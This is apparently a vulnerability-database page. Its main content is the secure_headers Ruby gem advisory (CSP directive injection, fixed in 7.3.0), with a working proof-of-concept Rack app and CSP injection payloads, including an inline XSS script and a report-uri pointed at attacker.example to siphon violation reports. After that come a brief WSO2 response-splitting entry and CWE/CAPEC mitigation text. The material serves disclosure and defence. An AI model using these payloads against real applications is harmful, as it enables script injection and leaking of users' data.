Shipped in 7.3.0 as a private helper that scrubs ;, \r, and \n from every directive value, applied uniformly across the three previously-uncovered builders and the source-list builder.

Sketch of the shipped change in lib/secure_headers/headers/content_security_policy.rb:

DIRECTIVE_INJECTION_REGEX = /[\n\r;]/.freeze

def scrub_directive_value(directive, value)
  str = value.to_s
  if str =~ DIRECTIVE_INJECTION_REGEX
    Kernel.warn("#{directive} contains a #{$~[0].inspect} in #{str.inspect} which will raise an error in future versions. It has been replaced with a blank space.")
    str.gsub(DIRECTIVE_INJECTION_REGEX, " ")
  else
    str
  end
end

The helper is invoked from each builder against the joined directive value (not per-token), so a single Kernel.warn is emitted per directive regardless of how many offending bytes the input contains. The same helper now also wraps the existing source-list scrub.

See the merged fix PR for the full patch and tests.

Credit

Reported by @tonghuaroot.

Resources

  • CVE-2020-5217 — prior secure_headers advisory for the same bug class on build_source_list_directive (the 2020 fix that motivated the helper this advisory extends).
  • W3C CSP Level 3 — Parse a serialized CSP — defines the first-occurrence rule that makes the alphabetical-ordering exploit work.
  • RFC 7230 §3.2.4 — Field parsing — context for why bare \r / \n in HTTP header values are unsafe regardless of directive separator semantics.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "secure_headers"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54163"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-10T20:37:15Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\n`secure_headers` builds the `Content-Security-Policy` value by stitching every configured directive together with `; ` separators. Three directive builders (`build_sandbox_list_directive`, `build_media_type_list_directive`, `build_report_to_directive`) interpolate caller-supplied strings into that value without scrubbing `;`, `\\r`, or `\\n`.\n\nWhen an application forwards untrusted input into `SecureHeaders.override_content_security_policy_directives` (or `append_\u2026`) for `:sandbox`, `:plugin_types`, or `:report_to`, an attacker can embed a literal `;` and inject an arbitrary CSP directive into the header value. Because `:sandbox` and `:plugin_types` both sort alphabetically before `:script_src` in `BODY_DIRECTIVES`, the injected `script-src` lands earlier in the header and wins under the [CSP first-occurrence rule](https://www.w3.org/TR/CSP3/#parse-serialized-policy), defeating the application\u0027s real `script-src`. End result: an `\u0027unsafe-inline\u0027 *` policy is forced for inline `\u003cscript\u003e` despite the configured strict CSP, giving full XSS reachability anywhere reflected or stored content meets one of these three sinks.\n\nAn existing `;`/`\\n` scrub is already present in the source-list builder (`build_source_list_directive`), but the three sibling builders here never received the same treatment and still emit caller bytes verbatim into the CSP value.\n\n## Impact\n\nAlthough piping untrusted input into CSP directives is generally discouraged, applications that do so for one of the three uncovered directives turn that endpoint into an XSS sink with an effective `*` `\u0027unsafe-inline\u0027` `script-src`, even though the global config says `script_src: %w(\u0027self\u0027)`. The same primitive can also be used to point `report-to` / `report-uri` at attacker infrastructure to silently siphon CSP violation reports \u2014 which include the violated URL, blocked-uri, source-file, line-number and a sample-snippet, useful for fingerprinting and for harvesting victim-internal URLs.\n\nThe global default CSP set in `Configuration.default` is supposed to be a backstop: even if a controller appends a single risky value, the strict `script-src` should remain the first match. This bug breaks that property by letting the appended value redefine the policy header upstream of the legitimate `script-src`.\n\n## Affected\n\n- **Package:** `secure_headers` (RubyGems)\n- **Vulnerable versions:** `\u003c= 7.2.0`\n- **Patched version:** `7.3.0`\n\nApplications that set `:sandbox`, `:plugin_types`, or `:report_to` only from static configuration (no per-request or per-tenant input) are not exploitable and need only the version bump. Applications that pipe any user-controlled value into one of those three directives via the per-controller override APIs are exploitable and should both upgrade and audit those code paths.\n\n## Mitigations / Workarounds\n\nUntil upgrading to **7.3.0**, sanitize any user-controlled input before passing it to:\n\n- `SecureHeaders.override_content_security_policy_directives`\n- `SecureHeaders.append_content_security_policy_directives`\n- `SecureHeaders.use_content_security_policy_named_append`\n\nfor `:sandbox`, `:plugin_types`, or `:report_to`. Reject or strip `;`, `\\r`, and `\\n` from values destined for these directives before they reach the gem.\n\n## Vulnerable code\n\nThree sibling builders all join an attacker-controllable value into the CSP header value with no `;` / `\\r` / `\\n` scrubbing.\n\n- [`content_security_policy.rb#L72-L93`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L72-L93) \u2014 `build_sandbox_list_directive`:\n\n```ruby\nelsif sandbox_list \u0026\u0026 sandbox_list.any?\n  [\n    symbol_to_hyphen_case(directive),\n    sandbox_list.uniq\n  ].join(\" \")\nend\n```\n\n- [`content_security_policy.rb#L95-L103`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L95-L103) \u2014 `build_media_type_list_directive` (same pattern, for `plugin-types`).\n- [`content_security_policy.rb#L105-L110`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L105-L110) \u2014 `build_report_to_directive`:\n\n```ruby\ndef build_report_to_directive(directive)\n  return unless endpoint_name = @config.directive_value(directive)\n  if endpoint_name \u0026\u0026 endpoint_name.is_a?(String) \u0026\u0026 !endpoint_name.empty?\n    [symbol_to_hyphen_case(directive), endpoint_name].join(\" \")\n  end\nend\n```\n\nFor comparison, [`content_security_policy.rb#L117-L129`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L117-L129) shows the source-list builder that already performs the scrub the three above are missing.\n\nValidation also does not catch it:\n\n- [`policy_management.rb#L361-L371`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/policy_management.rb#L361-L371) \u2014 `validate_sandbox_expression!` only checks `v.start_with?(\"allow-\")`, so `\"allow-scripts allow-same-origin; script-src \u0027unsafe-inline\u0027 *\"` passes.\n- [`policy_management.rb#L376-L385`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/policy_management.rb#L376-L385) \u2014 `validate_media_type_expression!` uses `/\\A.+\\/.+\\z/`; `.` matches `;` and `\u0027`, so `\"application/x-foo; script-src \u0027unsafe-inline\u0027 *\"` passes.\n- [`policy_management.rb#L410-L417`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/policy_management.rb#L410-L417) \u2014 `validate_report_to_endpoint_expression!` only checks `String` + non-empty.\n\n## Reachable\n\nThe three sinks are reached by the documented public override APIs in [`lib/secure_headers.rb#L61-L106`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers.rb#L61-L106) \u2014 `override_content_security_policy_directives`, `append_content_security_policy_directives`, and `use_content_security_policy_named_append`. These are the documented per-controller hooks Rails apps use to vary CSP per request (e.g. allowing an iframe domain that a user just configured, sandboxing a per-tenant subdocument, or wiring up a per-tenant reporting endpoint).\n\nConcrete reachable shapes:\n\n1. Multi-tenant SaaS persisting a tenant-chosen iframe sandbox policy and replaying it via `override_content_security_policy_directives(sandbox: [tenant.sandbox_tokens])`.\n2. Document / PDF viewer that allows tenants to whitelist a custom MIME via `plugin_types: [tenant.allowed_mime]`.\n3. Reporting integration that lets the operator name the active reporting group through an admin UI and forwards it via `report_to: params[:report_group]`.\n\nIn all three patterns, a string field that the app expects to be a single token (`allow-forms`, `application/pdf`, `default`) is the injection point.\n\n## Proof of concept\n\nPinned reproduction against a minimal Rack app on `secure_headers 7.2.0`, `rack 3.2.6`, `rackup 2.3.1`, `webrick 1.9.2`. Browser verification uses headless Chromium.\n\nInstall (Bundler):\n\n```ruby\n# Gemfile\nsource \"https://rubygems.org\"\ngem \"secure_headers\", \"= 7.2.0\"\ngem \"rack\",           \"= 3.2.6\"\ngem \"rackup\",         \"= 2.3.1\"\ngem \"webrick\", \"= 1.9.2\"\n```\n\n```bash\nbundle install\n```\n\nDriver (`poc_e2e.rb`):\n\n```ruby\nrequire \"rack\"\nrequire \"webrick\"\nrequire \"rackup\"\nrequire \"rackup/handler/webrick\"\nrequire \"secure_headers\"\n\nSecureHeaders::Configuration.default do |c|\n  c.csp = {default_src: %w(\u0027self\u0027), script_src: %w(\u0027self\u0027), style_src: %w(\u0027self\u0027)}\nend\n\nINLINE_XSS = \"\u003cscript\u003edocument.body.appendChild(Object.assign(\" \\\n             \"document.createElement(\u0027div\u0027),{id:\u0027pwn\u0027,innerText:\" \\\n             \"\u0027XSS-EXECUTED via \u0027+location.pathname}));\u003c/script\u003e\"\n\nclass App\n  def call(env)\n    req = Rack::Request.new(env)\n    case req.path_info\n    when \"/sandbox\"  # Vector A\n      SecureHeaders.override_content_security_policy_directives(req,\n        sandbox: [\"allow-scripts allow-same-origin; script-src \u0027unsafe-inline\u0027 *\"])\n    when \"/plugin\"   # Vector B\n      SecureHeaders.override_content_security_policy_directives(req,\n        plugin_types: [\"application/x-foo; script-src \u0027unsafe-inline\u0027 *\"])\n    when \"/report\"   # Vector C (report-uri exfil)\n      SecureHeaders.override_content_security_policy_directives(req,\n        report_to: \"default; report-uri https://attacker.example/leak\")\n    when \"/control\"  # Negative \u2014 same payload on a source_list directive\n      SecureHeaders.override_content_security_policy_directives(req,\n        frame_src: [\"\u0027self\u0027\", \"evil.example; script-src \u0027unsafe-inline\u0027 *\"])\n    end\n    body = \"\u003c!doctype html\u003e#{INLINE_XSS}\"\n    [200, {\"content-type\"=\u003e\"text/html\"}.merge(SecureHeaders.header_hash_for(req)), [body]]\n  end\nend\n\nRackup::Handler::WEBrick.run(\n  Rack::Builder.new { use SecureHeaders::Middleware; run App.new },\n  Host: \"127.0.0.1\", Port: 14567, AccessLog: [], Logger: WEBrick::Log.new(nil, 0))\n```\n\nRun:\n\n```bash\nbundle exec ruby poc_e2e.rb\n```\n\n### End-to-end reproduction against `secure_headers 7.2.0`\n\nServer-side observation (`curl -s -D - http://127.0.0.1:14567/\u003cpath\u003e`):\n\n```\nGET /sandbox  -\u003e content-security-policy:\n    default-src \u0027self\u0027; sandbox allow-scripts allow-same-origin;\n    script-src \u0027unsafe-inline\u0027 *; script-src \u0027self\u0027; style-src \u0027self\u0027\n\nGET /plugin   -\u003e content-security-policy:\n    default-src \u0027self\u0027; plugin-types application/x-foo;\n    script-src \u0027unsafe-inline\u0027 *; script-src \u0027self\u0027; style-src \u0027self\u0027\n\nGET /report   -\u003e content-security-policy:\n    default-src \u0027self\u0027; script-src \u0027self\u0027; style-src \u0027self\u0027;\n    report-to default; report-uri https://attacker.example/leak\n\nGET /control  -\u003e content-security-policy:\n    default-src \u0027self\u0027; frame-src \u0027self\u0027 evil.example  script-src\n    \u0027unsafe-inline\u0027 *; script-src \u0027self\u0027; style-src \u0027self\u0027\n```\n\nBrowser verification (headless Chromium, `--dump-dom`, grep for the injected `id=\"pwn\"` element which is only present if the inline `\u003cscript\u003e` actually ran):\n\n```\nGET /sandbox  -\u003e pwn element PRESENT  (XSS executed, injected script-src wins)\nGET /plugin   -\u003e pwn element PRESENT  (XSS executed, injected script-src wins)\nGET /report   -\u003e pwn element absent   (this vector enables report-uri exfil,\n                                       not script execution by itself)\nGET /control  -\u003e pwn element absent   (existing scrub on the source-list\n                                       builder rewrites ; -\u003e space, so the\n                                       legitimate `script-src \u0027self\u0027` is\n                                       still the first match)\n```\n\nPatched-build verification: applying the patch and re-running the same three vectors flips `/sandbox` and `/plugin` to \"pwn element absent\". The injected `;` is replaced with a space, so the trailing `script-src \u0027unsafe-inline\u0027 *` collapses into the parent directive\u0027s value list instead of becoming a sibling directive, and the legitimate `script-src \u0027self\u0027` stays the first `script-src` the parser encounters.\n\n## Patch\n\nShipped in **7.3.0** as a private helper that scrubs `;`, `\\r`, and `\\n` from every directive value, applied uniformly across the three previously-uncovered builders and the source-list builder.\n\nSketch of the shipped change in `lib/secure_headers/headers/content_security_policy.rb`:\n\n```ruby\nDIRECTIVE_INJECTION_REGEX = /[\\n\\r;]/.freeze\n\ndef scrub_directive_value(directive, value)\n  str = value.to_s\n  if str =~ DIRECTIVE_INJECTION_REGEX\n    Kernel.warn(\"#{directive} contains a #{$~[0].inspect} in #{str.inspect} which will raise an error in future versions. It has been replaced with a blank space.\")\n    str.gsub(DIRECTIVE_INJECTION_REGEX, \" \")\n  else\n    str\n  end\nend\n```\n\nThe helper is invoked from each builder against the **joined** directive value (not per-token), so a single Kernel.warn is emitted per directive regardless of how many offending bytes the input contains. The same helper now also wraps the existing source-list scrub.\n\nSee the merged fix PR for the full patch and tests.\n\n## Credit\n\nReported by [@tonghuaroot](https://github.com/tonghuaroot).\n\n## Resources\n\n- CVE-2020-5217 \u2014 prior `secure_headers` advisory for the same bug class on `build_source_list_directive` (the 2020 fix that motivated the helper this advisory extends).\n- [W3C CSP Level 3 \u2014 Parse a serialized CSP](https://www.w3.org/TR/CSP3/#parse-serialized-policy) \u2014 defines the first-occurrence rule that makes the alphabetical-ordering exploit work.\n- [RFC 7230 \u00a73.2.4 \u2014 Field parsing](https://www.rfc-editor.org/rfc/rfc7230#section-3.2.4) \u2014 context for why bare `\\r` / `\\n` in HTTP header values are unsafe regardless of directive separator semantics.",
  "id": "GHSA-rqq5-2gf9-4w4q",
  "modified": "2026-07-10T20:37:15Z",
  "published": "2026-07-10T20:37:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/github/secure_headers/security/advisories/GHSA-rqq5-2gf9-4w4q"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/github/secure_headers"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2026-54163.yml"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord/SearchResults?query=CVE-2026-54163"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Secure Headers: CSP directive injection via sandbox, plugin_types, and report_to when given untrusted input"
}

GHSA-RVPC-W57P-Q95F

Vulnerability from github – Published: 2022-02-09 22:35 – Updated: 2021-04-07 21:38
VLAI
Summary
HTTP Response Splitting in WSO2 transport-http
Details

Netty in WSO2 transport-http before v6.3.1 is vulnerable to HTTP Response Splitting due to HTTP Header validation being disabled.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.wso2.transport.http:org.wso2.transport.http.netty"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-10797"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-07T21:38:25Z",
    "nvd_published_at": "2020-02-19T19:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Netty in WSO2 transport-http before v6.3.1 is vulnerable to HTTP Response Splitting due to HTTP Header validation being disabled.",
  "id": "GHSA-rvpc-w57p-q95f",
  "modified": "2021-04-07T21:38:25Z",
  "published": "2022-02-09T22:35:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10797"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWSO2TRANSPORTHTTP-548944"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "HTTP Response Splitting in WSO2 transport-http"
}

Mitigation
Implementation

Strategy: Input Validation

Construct HTTP headers very carefully, avoiding the use of non-validated input data.

Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. If an input does not strictly conform to specifications, reject it or transform it into something that conforms.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation MIT-30
Implementation

Strategy: Output Encoding

Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.

Mitigation MIT-20
Implementation

Strategy: Input Validation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.

CAPEC-105: HTTP Request Splitting

An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).

See CanPrecede relationships for possible consequences.

CAPEC-31: Accessing/Intercepting/Modifying HTTP Cookies

This attack relies on the use of HTTP Cookies to store credentials, state information and other critical data on client systems. There are several different forms of this attack. The first form of this attack involves accessing HTTP Cookies to mine for potentially sensitive data contained therein. The second form involves intercepting this data as it is transmitted from client to server. This intercepted information is then used by the adversary to impersonate the remote user/session. The third form is when the cookie's content is modified by the adversary before it is sent back to the server. Here the adversary seeks to convince the target server to operate on this falsified information.

CAPEC-34: HTTP Response Splitting

An adversary manipulates and injects malicious content, in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., web server) or into an already spoofed HTTP response from an adversary controlled domain/site.

See CanPrecede relationships for possible consequences.

CAPEC-85: AJAX Footprinting

This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.